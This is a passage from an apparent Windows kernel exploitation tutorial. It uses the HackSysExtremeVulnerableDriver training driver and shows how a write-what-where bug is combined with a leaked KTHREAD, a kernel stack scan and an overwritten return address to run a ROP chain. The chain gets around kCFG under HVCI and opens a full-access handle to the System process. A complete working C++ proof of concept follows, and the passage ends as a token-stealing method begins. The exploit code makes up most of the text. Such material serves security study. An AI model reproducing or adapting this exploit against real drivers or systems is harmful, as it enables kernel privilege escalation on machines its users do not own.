All of the above attacks worked with Virtualization-based Security (VBS) enabled but with Hypervisor-Enforced Code Integrity (HVCI), also called Memory Integrity, disabled in the VM.
I enabled HVCI and restarted the machine to try the above exploits again, and it ended up with the following error:
This is because isolation is implemented through Virtual Trust Levels (VTLs), which I have already explained in: https://ghostbyt3.github.io/blog/Kernel_Exploitation_Primer_0x3#hyper-v.
So in our attack, we flipped the PTE bits/flags and cleared the no eXecute bit in VTL0; however, the EPT (Extended Page Tables) in VTL1 does not have this change, so it blocks our exploit.
# PTE before clearing the no eXecute bit
---DA--KW-V
# PTE after clearing the no eXecute bit
---DA--KWEV
# EPTE
---DA--W-V
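One way to read the three flag strings above is that an access has to be allowed by both translation stages. The sketch below is a deliberately simplified model of that idea (it ignores details such as how the hypervisor distinguishes kernel-mode and user-mode execution); the `Perms` type and `effective` function are hypothetical names for illustration.

```cpp
// Simplified permission set for one page.
struct Perms {
    bool read;
    bool write;
    bool execute;
};

// ASSUMPTION: effective access modeled as the intersection of the guest PTE
// (VTL0 page tables) and the EPT entry controlled outside VTL0.
constexpr Perms effective(Perms guestPte, Perms ept) {
    return Perms{ guestPte.read && ept.read,
                  guestPte.write && ept.write,
                  guestPte.execute && ept.execute };
}

constexpr Perms kPteBefore{ true, true, false }; // ---DA--KW-V
constexpr Perms kPteAfter{ true, true, true };   // ---DA--KWEV
constexpr Perms kEpte{ true, true, false };      // EPTE: writable, not executable

static_assert(!effective(kPteBefore, kEpte).execute, "not executable before the flip");
static_assert(!effective(kPteAfter, kEpte).execute, "still not executable after the flip");
static_assert(effective(kPteAfter, kEpte).write, "write access is unaffected");
```

In this model, flipping the bit in the VTL0 PTE changes only one of the two inputs, which matches the behavior observed with HVCI enabled.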
Additionally, with HVCI and VBS enabled, kCFG (kernel control flow guard) is also fully enabled. The kCFG bitmap (nt!guard_icall_bitmap), which is used to track which function addresses are valid call targets, is also protected by EPTEs, so we can’t overwrite it. However, kCFG protects function pointers (like nt!HalDispatchTable + 0x8) but does not protect return addresses. This means that while we cannot modify function pointers to redirect execution arbitrarily, we can overwrite a return address on the stack to hijack control flow. This is what we are going to do now.
As I mentioned in my previous post, we can’t execute unsigned code within the Windows kernel. But we can leverage a ROP chain to call kernel-mode functions. I attempted similar function calls in the previous post but couldn’t make them reliable, so let’s try again with the WRITE-WHAT-WHERE vulnerability and a different methodology. I am following the methodology Connor McGarr described in his blog post, which I highly recommend reading.
This is what we are going to do to get around HVCI and abuse WRITE-WHAT-WHERE to make kernel function calls:
- Step 1: Create a dummy thread in a suspended state using the CreateThread() API.
- Step 2: Using the NtQuerySystemInformation() API, leak the KTHREAD structure address of the suspended thread.
- Step 3: From the KTHREAD structure, retrieve KTHREAD.StackBase, which is the kernel-mode stack address of the thread.
- Step 4: On the stack, look for a specific function’s ret address. When a function call occurs, the address of the next instruction is pushed onto the stack; after the call finishes, the ret instruction pops the return address from the stack and jumps to it. kCFG (kernel control flow guard) does not inspect this kind of hijack, so we are going to find a specific return address (more on this later) and replace it with our ROP chain, which makes a kernel function call.
- Step 5: Once we have found the return address on the stack, write the rest of the ROP chain to make a call to ZwOpenProcess() and get a PROCESS_ALL_ACCESS handle to the System process.
- Step 6: End the ROP chain with a call to the kernel-mode function ZwTerminateThread(), which terminates the dummy thread. Because we messed up its stack, it will cause a BSOD if we don’t do this.
- Step 7: Finally, resume the thread using the ResumeThread() API. While continuing, the thread lands on the return address on the stack that we have overwritten, starts executing our ROP chain, gets the handle to the System process, and at the end terminates itself.
Step 1: Creating a dummy thread
- Creating a dummy thread can be done easily by calling the CreateThread() API with CREATE_SUSPENDED as dwCreationFlags.
- Once the thread is created, the call returns a handle to the dummy suspended thread (dHandle).
- We also need to specify which function the thread executes once it is resumed; for that, I provided a dummy function called donothing().
void donothing()
{
return;
}
HANDLE fakethread() {
HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);
if (!dHandle) {
printf("[-] Failed creating a suspended thread..\n");
}
else {
printf("[+] Dummy thread Handle: %p\n", dHandle);
}
return dHandle;
}
int main()
{
printf("[+] Creating a dummy thread..\n");
HANDLE dHandle = fakethread();
if (!dHandle) {
return 1;
}
return 0;
}
Step 2: Leak KTHREAD address
- Now we need to retrieve the KTHREAD of the dummy thread; for that, we can use the NtQuerySystemInformation() API function.
- Since we need the information related to handles, we will be using SystemHandleInformation as the SystemInformationClass parameter, which indicates the kind of system information to be retrieved.
- We need the following structures for this process: SYSTEM_INFORMATION_CLASS, SYSTEM_HANDLE_INFORMATION, SYSTEM_HANDLE_TABLE_ENTRY_INFO.
- The SystemHandleInformation class provides information on all the handles on the machine.
- From the NtQuerySystemInformation() API call, we store all of this handle information in SystemHandleInfo. However, we need to provide a buffer large enough to hold it, and we can’t predict that size. We could just allocate a huge buffer, but that’s not reliable.
- To solve this issue, I started with a size of 0x1000 bytes and kept increasing it until the call no longer returns the STATUS_INFO_LENGTH_MISMATCH status.
- Then it parses every handle and checks whether the handle’s UniqueProcessId is the same as the current process ID. Once an entry belonging to the current process is found, it compares the handle we provided via the argument with the handle value of that entry.
- Once the specific handle is discovered, we can get the object address with the help of _SYSTEM_HANDLE_TABLE_ENTRY_INFO, which contains a member called Object that holds the address of the object. In this case we are looking for the dummy thread handle, so the object is a thread, which means the Object member holds the KTHREAD address for that handle.
PVOID findKTHREAD(HANDLE dHandle) {
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return NULL;
    }
    printf("[+] Found ntdll!NtQuerySystemInformation\n");
    ULONG returnLen = 0x1000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = NULL;
    // Retry until the call stops returning STATUS_INFO_LENGTH_MISMATCH
    // (returnLen is updated by each call)
    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }
        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return NULL;
        }
        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);
    PVOID dKTHREAD = NULL;
    for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
    {
        if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
        {
            if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
            {
                dKTHREAD = SystemHandleInfo->Handles[i].Object;
                printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
                break;
            }
        }
    }
    // The buffer came from HeapAlloc, so release it exactly once with HeapFree
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return dKTHREAD;
}
I executed the POC, and it created a dummy thread with handle 0xA8. Using Process Explorer, we can cross-verify that the KTHREAD address leaked by the POC is the same as the one shown in Process Explorer, so our code works fine.
Step 3: Retrieving kernel stack address
KTHREAD is a structure associated with every thread, and it contains all the information about the thread (which is another big topic that I cannot cover now). All we need to know for now is that KTHREAD contains 2 interesting members required for the upcoming steps, and we need their offsets:
- StackLimit - offset 0x30
- StackBase - offset 0x38
As I said earlier, each thread has its own stack, and its stack address can be retrieved through the StackBase member of KTHREAD.
Now that we have the KTHREAD address, we can calculate the addresses of StackLimit and StackBase and read the actual values using WRITE-WHAT-WHERE, just like we did in the previous methods.
I created a kernelRead() function, which takes the address to read (the readAddr argument) and reads the value at that address by calling the TriggerArbitraryWrite() function.
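PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    WRITE_WHAT_WHERE input;
    // User-mode scratch buffer that receives the 8 bytes copied by the driver
    LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    if (!storeAddr) {
        printf("[-] VirtualAlloc failed: %lu\n", GetLastError());
        return NULL;
    }
    input.WHAT = (LPVOID)(readAddr);
    input.WHERE = (LPVOID)(storeAddr);
    printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
    BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);
    PVOID data = NULL;
    if (success) {
        printf("success\n");
        data = *(LPVOID*)storeAddr;
    }
    else {
        printf("failed\n");
    }
    // Release the scratch buffer on every path; this function is called in a loop later
    VirtualFree(storeAddr, 0, MEM_RELEASE);
    return data;
}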
By calling the kernelRead() function, we can retrieve both the StackLimit and StackBase values using the KTHREAD address and their respective offsets.
// Step 3
PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver); // KTHREAD.StackLimit
printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);
PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver); // KTHREAD.StackBase
printf("[+] Dummy thread's StackBase: %p\n", stackBase);
I executed the updated POC, retrieved the StackLimit and StackBase addresses, and cross-verified them with the KTHREAD structure of the dummy thread.
With the retrieved addresses, the total stack size of the thread is 0x6000. We need this for the next step.
0: kd> ? 0xfffff88e`b4126000 - 0xfffff88e`b4120000
Evaluate expression: 24576 = 00000000`00006000
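The same subtraction also tells us how many 8-byte slots a full scan of the stack has to read. A small sketch using the two addresses from the WinDBG output above (the helper names are made up for illustration):

```cpp
#include <cstdint>

// Addresses from the WinDBG session above.
constexpr std::uint64_t kStackBase  = 0xFFFFF88EB4126000ULL;
constexpr std::uint64_t kStackLimit = 0xFFFFF88EB4120000ULL;

// The stack grows downwards, so StackBase is the higher address.
constexpr std::uint64_t stackSize(std::uint64_t base, std::uint64_t limit) {
    return base - limit;
}

// Number of 8-byte slots between StackLimit and StackBase.
constexpr std::uint64_t slotCount(std::uint64_t base, std::uint64_t limit) {
    return stackSize(base, limit) / 8;
}

static_assert(stackSize(kStackBase, kStackLimit) == 0x6000, "24576 bytes");
static_assert(slotCount(kStackBase, kStackLimit) == 0xC00, "3072 qword slots");
```

In the worst case a scan issues one read per slot, so a 0x6000-byte stack means at most 3072 calls into the driver.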
Step 4: Find the return address of nt!KiApcInterrupt
Our goal is to overwrite a specific return address on the stack of the dummy thread we created. Using WinDBG’s !thread extension with the KTHREAD address, we can view the call stack. You might notice the function nt!KiApcInterrupt; we will be overwriting this return address.
When a new thread is created, it initially runs nt!KiStartUserThread in kernel mode, which then calls the initial thread routine, nt!PspUserThreadStartup; you can see this in the call stack as well. Since we created the thread in a suspended state (CREATE_SUSPENDED), all of its execution is held, including the donothing() function we made.
If you look at the call stack, the nt!KiApcInterrupt+0x2ff (TrapFrame @ fffff88e`b4125740) entry contains a trap frame; basically, it stores the CPU register state, allowing execution to resume correctly when the thread is resumed.
So when the thread is resumed, execution returns to nt!KiApcInterrupt+0x2ff, which means we need to find this return address (nt!KiApcInterrupt+0x2ff) on the stack and overwrite it with our ROP gadgets.
The return address on my machine is nt!KiApcInterrupt+0x2ff, so we need its offset from the nt base, because the address stored on the stack is the nt base plus this offset. We are going to search for this address on the stack.
0: kd> ? nt!KiApcInterrupt+0x2ff - nt
Evaluate expression: 4209647 = 00000000`00403bef
When the thread is resumed (from user mode using ResumeThread()), execution returns to nt!KiApcInterrupt+0x2ff, which will eventually execute our ROP chain; that’s the goal.
In the previous step we got StackBase and StackLimit, and we now have the offset of nt!KiApcInterrupt+0x2ff as well, so we are going to search for this address on the thread’s stack.
The following for loop reads 8 bytes at a time using kernelRead, beginning from the base of the stack (StackBase) and going towards the end of the stack (StackLimit). Remember that the stack grows downwards, so we need to move towards lower memory addresses.
// Step 4
LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
printf("[+] Nt base address: %p\n", nt_addr);
int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
PVOID retAddr = NULL;
PVOID stackRet = NULL;
for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
{
retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);
if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
{
printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
stackRet = PVOID((uintptr_t)stackBase - i);
break;
}
}
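The scan can be rehearsed in user mode against a fake stack before pointing it at the kernel. The sketch below is an assumption-laden model: the vector stands in for the thread’s stack memory (index 0 is the qword at StackLimit), each element access stands in for one kernelRead() call, and the names `findReturnSlot` and `rebase` are hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Rebase an image-relative offset (e.g. 0x403bef) onto the leaked nt base.
constexpr std::uint64_t rebase(std::uint64_t ntBase, std::uint64_t offset) {
    return ntBase + offset;
}

// Walk from just below stackBase towards lower addresses and return the
// address of the first slot that holds `target`, or 0 if it is not found.
// stack[0] models the qword at StackLimit; stack.back() the qword just below StackBase.
inline std::uint64_t findReturnSlot(const std::vector<std::uint64_t>& stack,
                                    std::uint64_t stackBase,
                                    std::uint64_t target) {
    for (std::size_t i = 1; i <= stack.size(); ++i) {
        // The i-th qword below stackBase lives at stackBase - i * 8.
        if (stack[stack.size() - i] == target) {
            return stackBase - i * 8;
        }
    }
    return 0;
}
```

Like the loop in the POC, this stops at the first match closest to StackBase. Returning 0 for "not found" makes it easy to bail out before any write is attempted.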
I paused the execution using getchar() to analyze it; the above code found nt!KiApcInterrupt+0x2ff on the stack at location 0xFFFFF88EB4125738, and I confirmed the same in WinDBG. Now that we have found the location of the return address we need to overwrite, let’s move to the next step.
Step 5 & 6: Writing ROP gadgets to call ZwOpenProcess & ZwTerminateThread
Similar to kernelRead, I created a kernelWrite function, which takes the value to write (data) and the location to write that value to (writeAddr) as arguments. It calls TriggerArbitraryWrite to write that value to the provided address.
BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    WRITE_WHAT_WHERE input;
    // WHAT must point at the value to write, so pass the address of our local copy
    input.WHAT = (LPVOID)(&data);
    input.WHERE = (LPVOID)(writeAddr);
    printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        printf("success\n");
        return TRUE;
    }
    printf("failed\n");
    return FALSE;
}
The ROP chain is similar to what I have used previously. It makes a call to ZwOpenProcess to get a full-control process handle to the System process (PID 4). Then it terminates the dummy thread by calling ZwTerminateThread. The reason for this call is that we messed up the stack of the dummy thread with our ROP gadgets, so after ZwOpenProcess executes, the thread would try to continue normally, which leads to a BSOD. To solve this we can just terminate the thread, since we don’t need it anymore.
- The ZwOpenProcess API requires some structures as parameters, but they can be declared in user mode.
- The ZwTerminateThread API requires the dummy thread handle; since I already stored that in dHandle, I just used it.
- I created a for loop to write each ROP gadget onto the stack. I stored the location of nt!KiApcInterrupt+0x2ff in stackRet, so that is the first address written, and each iteration increases the address by 8 bytes to move to the next slot.
// Step 5
// RCX - ProcessHandle
HANDLE hSystem = NULL;
// R8 - ObjectAttributes
OBJECT_ATTRIBUTES objAttrs = { 0 };
memset(&objAttrs, 0, sizeof(objAttrs));
objAttrs.ObjectName = NULL;
objAttrs.Length = sizeof(objAttrs);
// R9 - ClientId
CLIENT_ID clientId = { 0 };
clientId.UniqueProcess = ULongToHandle(4);
clientId.UniqueThread = NULL;
LPVOID rop[] = {
(LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
(LPVOID)&hSystem, // Handle
(LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
(LPVOID)PROCESS_ALL_ACCESS,
(LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
(LPVOID)&objAttrs,
(LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
(LPVOID)&clientId,
(LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
(LPVOID)(0x4141414141414141), // 0x8
(LPVOID)(0x4141414141414141), // 0x10
(LPVOID)(0x4141414141414141), // 0x18
(LPVOID)(0x4141414141414141), // 0x20
(LPVOID)(0x4141414141414141), // 0x28
(LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
(LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
(LPVOID)(ULONG64)dHandle, // Thread Handle
(LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
(LPVOID)(0x0000000000000000),
(LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
};
printf("[+] Writing Shellcode to the thread stack...\n");
for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
kernelWrite((rop[i]), stackRet, hDriver);
stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
}
I executed the above POC, and we can see that the nt!KiApcInterrupt+0x2ff return address is overwritten by the first ROP gadget and the rest of the ROP gadgets are in place.
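The five 0x4141414141414141 entries in the chain exist because the `mov r9, rax; mov rax, r9; add rsp, 0x28; ret` gadget skips 0x28 bytes before its ret. The index arithmetic can be checked with a short sketch; the positions refer to the rop[] array shown earlier, and `nextSlotAfterAddRsp` is a hypothetical helper name.

```cpp
#include <cstddef>

// Index of the qword popped by the final `ret` of an `add rsp, N; ret` gadget,
// given the index of the gadget's own address in the chain. When the gadget
// starts running, RSP already points at gadgetIndex + 1.
constexpr std::size_t nextSlotAfterAddRsp(std::size_t gadgetIndex, std::size_t addRspBytes) {
    return gadgetIndex + 1 + addRspBytes / 8;
}

constexpr std::size_t kMovR9Gadget   = 8;  // position of the `mov r9, rax; ...` gadget in rop[]
constexpr std::size_t kZwOpenProcess = 14; // position of nt!ZwOpenProcess in rop[]

static_assert(0x28 / 8 == 5, "five filler qwords are skipped");
static_assert(nextSlotAfterAddRsp(kMovR9Gadget, 0x28) == kZwOpenProcess,
              "the gadget's ret lands on nt!ZwOpenProcess");
```

If a different gadget with another `add rsp` constant is used on another build, the number of filler entries has to change accordingly.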
Step 7: Resume the Thread
Now that everything is ready, we can resume the thread by calling ResumeThread.
ResumeThread(dHandle);
Sleep(2000);
printf("[+] System process Handle %p\n", hSystem);
getchar();
Once the thread is resumed, it reaches the stack slot that held the nt!KiApcInterrupt+0x2ff return address; since that is replaced by our ROP gadget, it starts executing the chain and eventually calls ZwOpenProcess to get a full-control handle to the System process.
HVCI is a powerful mitigation, and we didn’t bypass it; instead, we got around it by calling kernel APIs, and we are still not able to execute unsigned shellcode. However, we did bypass kCFG by using the dummy thread method. There is also Control-flow Enforcement Technology (kCET), which will block the above method if it’s enabled, but it’s not enabled by default, at least for now.
Full POC
// whatwhere3.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <stdio.h>
#include <psapi.h>
#include "header.h"

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;
    void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

PVOID getbaseaddress(LPCWSTR name) {
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;
    WCHAR driverName[1024];
    LPVOID driverBase = nullptr;
    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    int driver_count = ImageSize / sizeof(pImageBase[0]);
    for (int i = 0; i < driver_count; i++) {
        // The size argument is a character count, so divide by the WCHAR element size
        GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));
        if (!wcscmp(name, driverName)) {
            driverBase = pImageBase[i];
            break;
        }
    }
    return driverBase;
}

void donothing()
{
    return;
}

HANDLE fakethread() {
    HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);
    if (!dHandle) {
        printf("[-] Failed creating a suspended thread..\n");
    }
    else {
        printf("[+] Dummy thread Handle: %p\n", dHandle);
    }
    return dHandle;
}

PVOID findKTHREAD(HANDLE dHandle) {
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return NULL;
    }
    printf("[+] Found ntdll!NtQuerySystemInformation\n");
    ULONG returnLen = 0x1000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = NULL;
    // Retry until the call stops returning STATUS_INFO_LENGTH_MISMATCH
    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }
        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return NULL;
        }
        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);
    PVOID dKTHREAD = NULL;
    for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
    {
        if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
        {
            if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
            {
                dKTHREAD = SystemHandleInfo->Handles[i].Object;
                printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
                break;
            }
        }
    }
    // The buffer came from HeapAlloc, so release it with HeapFree; NULL is returned if nothing matched
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return dKTHREAD;
}

PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    WRITE_WHAT_WHERE input;
    LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    if (!storeAddr) {
        printf("[-] VirtualAlloc failed: %lu\n", GetLastError());
        return NULL;
    }
    input.WHAT = (LPVOID)(readAddr);
    input.WHERE = (LPVOID)(storeAddr);
    printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
    BOOL success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    PVOID data = NULL;
    if (success) {
        printf("success\n");
        data = *(LPVOID*)storeAddr;
    }
    else {
        printf("failed\n");
    }
    // Release the scratch buffer; kernelRead is called once per stack slot in Step 4
    VirtualFree(storeAddr, 0, MEM_RELEASE);
    return data;
}

BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)(&data);
    input.WHERE = (LPVOID)(writeAddr);
    printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    BOOL success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
        return TRUE;
    }
    printf("failed\n");
    return FALSE;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    // Step 1
    printf("[+] Creating a dummy thread..\n");
    HANDLE dHandle = fakethread();
    if (!dHandle) {
        return 1;
    }
    getchar();

    // Step 2
    PVOID dKTHREAD = findKTHREAD(dHandle);
    if (dKTHREAD == NULL) {
        printf("[-] Unable to find KTHREAD of the dummy thread!\n");
        return 1;
    }
    getchar();

    // Step 3
    PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver);
    printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);
    PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver);
    printf("[+] Dummy thread's StackBase: %p\n", stackBase);
    getchar();

    // Step 4
    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);
    int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
    PVOID retAddr = NULL;
    PVOID stackRet = NULL;
    for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
    {
        retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);
        if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
        {
            printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
            stackRet = PVOID((uintptr_t)stackBase - i);
            break;
        }
    }
    if (!stackRet) {
        // Without a target slot the writes below would go to address 0, so stop here
        printf("[-] Unable to find nt!KiApcInterrupt+0x2ff in the stack\n");
        return 1;
    }
    getchar();

    // Step 5
    // RCX - ProcessHandle
    HANDLE hSystem = NULL;
    // R8 - ObjectAttributes
    OBJECT_ATTRIBUTES objAttrs = { 0 };
    memset(&objAttrs, 0, sizeof(objAttrs));
    objAttrs.ObjectName = NULL;
    objAttrs.Length = sizeof(objAttrs);
    // R9 - ClientId
    CLIENT_ID clientId = { 0 };
    clientId.UniqueProcess = ULongToHandle(4);
    clientId.UniqueThread = NULL;
    LPVOID rop[] = {
        (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
        (LPVOID)&hSystem, // Handle
        (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
        (LPVOID)PROCESS_ALL_ACCESS,
        (LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
        (LPVOID)&objAttrs,
        (LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
        (LPVOID)&clientId,
        (LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
        (LPVOID)(0x4141414141414141), // 0x8
        (LPVOID)(0x4141414141414141), // 0x10
        (LPVOID)(0x4141414141414141), // 0x18
        (LPVOID)(0x4141414141414141), // 0x20
        (LPVOID)(0x4141414141414141), // 0x28
        (LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
        (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
        (LPVOID)(ULONG64)dHandle, // Thread Handle
        (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
        (LPVOID)(0x0000000000000000),
        (LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
    };
    printf("[+] Writing Shellcode to the thread stack...\n");
    for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
        kernelWrite((rop[i]), stackRet, hDriver);
        stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
    }
    getchar();

    // Step 7
    ResumeThread(dHandle);
    Sleep(2000);
    printf("[+] System process Handle %p\n", hSystem);
    getchar();
    CloseHandle(dHandle);
    CloseHandle(hDriver);
    getchar();
    return 0;
}
Method (5) - Token Stealing
The next method is Token Stealing, which again leverages the Write-What-Where vulnerability. HVCI is enabled in this method, yet it is easy to perform because it only reads and writes kernel data.
Every process and thread has a “Token” that represents its security context. It contains information about the user account, group memberships, privileges, and access rights. The image below, from Process Hacker, shows the “Token” of the system process; stealing it gives us the same permissions as system.
Before writing the exploit, we need to cover a few basics that the POC relies on.
Each process has a Token, which is an _EX_FAST_REF union that can be accessed from the EPROCESS structure.
The EPROCESS structure contains a member called ActiveProcessLinks, a doubly linked list entry that points to the next process’s EPROCESS.ActiveProcessLinks, and a UniqueProcessId member, which is the PID of that specific process.
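To make these three members concrete, here is a minimal sketch of a mock layout. MockEprocess, ListEntry, and eprocessFromLinks are hypothetical names, not the real kernel definitions. The offsets are the ones this post uses for its target build (0x440, 0x448, 0x4b8) and will differ on other Windows versions. The sketch assumes a 64-bit build.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical stand-in with the same shape as LIST_ENTRY.
struct ListEntry {
    ListEntry* Flink;  // next entry in the list
    ListEntry* Blink;  // previous entry in the list
};

// Hypothetical, heavily trimmed stand-in for EPROCESS. Only the three members
// used by this method are named; everything else is padding.
struct MockEprocess {
    uint8_t   pad0[0x440];
    uint64_t  UniqueProcessId;      // 0x440: PID of the process
    ListEntry ActiveProcessLinks;   // 0x448: links to the neighbouring processes
    uint8_t   pad1[0x4b8 - 0x458];
    uint64_t  Token;                // 0x4b8: an _EX_FAST_REF in the real structure
};

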